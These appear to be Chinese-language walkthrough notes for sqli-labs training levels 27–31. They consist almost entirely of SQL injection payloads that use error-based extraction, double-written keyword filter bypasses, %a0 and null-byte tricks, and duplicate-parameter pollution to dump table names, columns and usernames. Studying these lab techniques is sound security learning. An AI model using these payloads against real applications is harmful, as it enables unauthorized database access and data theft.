27.
过滤了union和select 使用双写绕过
有报错信息使用报错注入
1'and(extractvalue(1,concat(0x5c,database())))and'1'='1
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(selseselectlectect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')),0x7e),1))and'1'='1
1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(username))from(security.users)))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(username))from(security.users)),0x7e),1))and'1'='1
这里显示不了所有的数据可以使用limit
27a.
没报错信息了
‘不能闭合尝试“发现”可以闭合
0"ununionion%a0seselselectectlect%a01,2,3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,database(),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3%a0and"1"="1
0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(username)%a0from%a0security.users),3%a0and"1"="1
28.
不会返回报错信息无法使用报错注入
1')union%a0select%a01,2,3;%00
0')union%a0select%a01,database(),3;%00
0')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3;%00
0')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3;%00
0')union%a0select%a01,(select%a0group_concat(username)%a0from%a0security.users),3;%00
28a.
0')union%a0select 1,2,3;%00
0')union%a0select 1,database(),3;%00
0')union%a0select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3;%00
0')union%a0select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3;%00
0')union%a0select 1,(select group_concat(username) from security.users),3;%00
29.
题目显示会检测输入的参数是不是数字类型,在sql语句中接收相同的参数时会使用后面的值
这里传递两个id
&id=0'union select 1,database(),3 --+
&id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
&id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
&id=0'union select 1,(select group_concat(username) from security.users),3 --+
30.
单引号换成双引号
&id=0"union select 1,2,3 --+
&id=0"union select 1,database(),3 --+
&id=0"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
&id=0"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
&id=0"union select 1,(select group_concat(username) from security.users),3 --+
31.
&id=0")union select 1,2,3 --+多了个括号
&id=0")union select 1,database(),3--+
&id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
&id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
&id=0")union select 1,(select group_concat(username) from security.users),3--+
